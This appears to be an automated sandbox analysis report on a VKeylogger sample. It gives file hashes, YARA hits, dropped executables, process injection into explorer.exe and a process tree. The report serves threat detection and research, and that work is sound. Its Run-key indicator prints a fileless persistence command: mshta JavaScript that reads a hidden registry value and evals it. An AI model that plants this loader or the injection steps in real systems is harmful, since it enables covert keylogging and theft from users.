Analysis
-
max time kernel
279s -
max time network
285s -
platform
windows10-2004_x64 -
resource
win10v2004-20220310-en -
submitted
21-03-2022 03:07
Static task
static1
Behavioral task
behavioral1
Sample
b2b_2022-03-20_00-04.exe
Resource
win7-20220310-en
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
b2b_2022-03-20_00-04.exe
Resource
win10v2004-20220310-en
0 signatures
0 seconds
General
-
Target
b2b_2022-03-20_00-04.exe
-
Size
298KB
-
MD5
773c9670c70dd5c465ad8e57a39ae55a
-
SHA1
dc117d5ecfdea361e0c31568c3a78714461ad02b
-
SHA256
e6ccc7cc7154361faaf1994b3395a27bb0b8a97f002e28bcdba5e9901793bb00
-
SHA512
265e1d19da3f1a13a25fc2dd6a12cfff484520e1228517d57dfb9cb4ff171bc4d4f986321eba619dbbb77019c714daf1b6bcd7c9dc921ddcee86ef0b25aa2dac
Score
10/10
Malware Config
Signatures
-
VKeylogger
A keylogger first seen in Nov 2020.
-
VKeylogger Payload 3 IoCs
resource yara_rule behavioral2/memory/3512-136-0x0000000000720000-0x0000000000732000-memory.dmp family_vkeylogger behavioral2/memory/3512-137-0x0000000000400000-0x0000000000474000-memory.dmp family_vkeylogger behavioral2/memory/1500-138-0x0000000000A00000-0x0000000000A13000-memory.dmp family_vkeylogger -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 4636 888.exe 4112 108.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ghtrh = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mfoedmf = "C:\\Users\\Admin\\AppData\\Local\\Temp\\b2b_2022-03-20_00-04.exe" explorer.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3512 set thread context of 1500 3512 b2b_2022-03-20_00-04.exe 89 -
Program crash 1 IoCs
pid pid_target Process procid_target 3104 3512 WerFault.exe 84 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4636 888.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3512 b2b_2022-03-20_00-04.exe 1500 explorer.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1500 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1500 explorer.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3512 wrote to memory of 1500 3512 b2b_2022-03-20_00-04.exe 89 PID 3512 wrote to memory of 1500 3512 b2b_2022-03-20_00-04.exe 89 PID 3512 wrote to memory of 1500 3512 b2b_2022-03-20_00-04.exe 89 PID 1500 wrote to memory of 4636 1500 explorer.exe 104 PID 1500 wrote to memory of 4636 1500 explorer.exe 104 PID 1500 wrote to memory of 4112 1500 explorer.exe 106 PID 1500 wrote to memory of 4112 1500 explorer.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\b2b_2022-03-20_00-04.exe"C:\Users\Admin\AppData\Local\Temp\b2b_2022-03-20_00-04.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"2⤵
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Users\Admin\AppData\Local\Temp\888.exe"C:\Users\Admin\AppData\Local\Temp\888.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:4636
-
-
C:\Users\Admin\AppData\Local\Temp\108.exe"C:\Users\Admin\AppData\Local\Temp\108.exe"3⤵
- Executes dropped EXE
PID:4112
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 2882⤵
- Program crash
PID:3104
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3512 -ip 35121⤵PID:3900